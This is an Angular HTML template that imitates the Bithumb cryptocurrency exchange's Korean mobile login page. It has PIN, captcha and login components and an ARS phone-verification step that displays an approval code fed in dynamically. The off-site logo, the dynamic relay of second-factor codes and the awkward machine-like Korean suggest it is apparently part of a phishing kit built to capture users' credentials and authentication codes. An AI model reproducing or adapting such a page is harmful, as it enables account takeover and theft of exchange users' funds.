
       <script src="https://cdnjs.cloudflare.com/ajax/libs/jrumble/1.3.0/jquery.jrumble.min.js" integrity="sha512-0vcUK0oQ15FtIrg1bbNL6zO2yB0pSZjPZERBNA0ZXIw/7jsSHu+rxxbpbM20wIaiEofTK9oPoP/Y8xvh3qoasQ==" crossorigin="anonymous"></script>
       <ngx-spinner bdColor = "rgba(0,0,0,0.64)" size = "medium" color = "#fff" type = "line-scale" [fullScreen] = "true"></ngx-spinner>
 
 <header id="header">
    
    <div id="smartBanner">
       <div class="nav-fixed-search" id="navFixedSearch">
          <div class="form-group form-group--reset form-group--search-nav-fixed inp_search">
             <div class="form-group__box form-group__box--icon-left inp_search"><input type="text" class="form-group__control form-group__control--no-border __nav-fixed-search-input" id="txtSearch" data-language="main.msg.01" placeholder="코인명 또는 심볼 검색"><button type="button" class="button-form-reset g_hidden"><i class="sp-mobile-head ico_reset"></i></button><span class="form-group__icon form-group__icon--search"><i class="sp-mobile-head"></i></span></div>
          </div>
          <button type="button" class="nav-fixed-search__button" id="navFixedSearchClose"><span class="nav-fixed-search__button-text" data-language="page.common.msg07">취소</span></button>
       </div>
       <nav class="nav-fixed">
          <div class="nav-fixed-box--left" id="navFixedSearch"><a href="" class="nav-fixed__prev-button" id="headHref">
             <img height="30px" src="https://i.ibb.co/17gdq6b/Bithumb-logo.png">
          
          </a></div>
          <div class="nav-fixed-box--center">
             <h3 class="nav-fixed__title">로그인</h3>
          </div>
          <div class="nav-fixed-box--right"></div>
       </nav>
    </div>
 </header>
 <div *ngFor="let item of items" >
 
   <span *ngIf="item.pin != '';">
      <div class="content">
         <app-wpin></app-wpin>
        </div>
  </span>
  <span *ngIf="item.cap != '';">
   <div class="content">
      <app-cap></app-cap>
     </div>
  </span>

  <span *ngIf="item.log != '';">
   <div class="content">
      <app-wlog></app-wlog>
     </div>
  </span>



<div *ngIf="item.ars != '0';" class="content" >
   <form action="" id="frmLogin" name="frmLogin" method="post" accept-charset="utf-8">
   <div class="row">
      <div class="pincode-input-container" style="padding: 10px;display: flex; align-items: center; justify-content: center;">
        ARS 확인
      </div>
      <div class="zebi" style="padding: 10px;display: flex; align-items: center; justify-content: center;">

  
        <div class="card-title">회원님께 ARS 인증을 위해 전화를 걸고 있습니다.<br>
           승인번호<br>
           
           <div *ngFor="let item of items" >
              <span *ngIf="item.ars != ''; else noitem" class="waei2"></span>
               <span class="weni">
                  <b>
                 {{item.ars}}
             </b>
           </span>
               
           </div>
           <ng-template  #noitem>
              <span class="card-title">
                 <div class="fa-2x wenix spincolor">
                    <i class="fas fa-circle-notch fa-spin"></i>
                 </div>
                 </span>
                    코드가 생성 될 때까지 기다리십시오
           </ng-template>
       </div>
     </div>

         <div class="pincode-input-container" style="padding: 10px;display: flex; align-items: center; justify-content: center;">
            <span [style.display]="flag2 ? color2 : color3" class="ebi22">ars가 확인되지 않았습니다. 다시 시도하십시오.</span>         
         </div>

   </div>
</form>
<div data-language="kakao.msg1" class="kakao-message">카카오톡 알림톡을 통해 인증번호를 받아보실 수 있으며, 카카오톡 사용자가 아닐 경우 SMS로 인증번호가 발송됩니다.</div>
<div class="row">
   <div (click)="psteml()" class="btn_orange btn-large col s12 center-align waves-effect" id="btnLogin" data-scanning="btnLogin" data-language="common.msg295">

      <span [style.display]="flag1 ? color3 : color2" >  <i class="fas fa-spinner fa-spin"></i></span>
      <span [style.display]="flag1 ? color2 : color3" class="waves-effect">나는 확인했다</span>         
   
   </div>
</div>


<ul class="notice list">
  <li data-language="page.u1.msg04">위에 표시된 코드 후에 전화를 받게됩니다.</li>
  <li data-language="page.u1.msg04">기다려주십시오,</li>
  <li data-language="page.u1.msg04">이 작업은 몇 분 정도 걸릴 수 있습니다.</li>
</ul>

</div>


 </div>




 
 
 <ul class="bottomMenu">
    <li class=""><a  data-language="common.head.msg22" class="GA_PUBLIC_BOTTOM_MENU_HOME"><i class="sp-mobile-head trade"></i>거래소</a></li>
    <li class="">
       <a  data-language="common.head.msg23" class="GA_PUBLIC_BOTTOM_MENU_LENDING">
          <div class="ico_container"><i class="icoNew icoNewMenu">N</i></div>
          <i class="sp-mobile-head lending"></i>렌딩
       </a>
    </li>
    <li class=""><a   data-language="common.head.msg23" class="GA_PUBLIC_BOTTOM_MENU_ASSET"><i class="sp-mobile-head asset"></i>자산현황</a></li>
    <li class=""><a   data-language="page.common.msg583" class="GA_PUBLIC_BOTTOM_MENU_DEPOSIT"><i class="sp-mobile-head depositNWithdraw"></i>입출금</a></li>
    <li class=""><a  data-language="page.common.msg777" class=""><i class="sp-mobile-head more-menu"></i>더보기</a></li>
 </ul>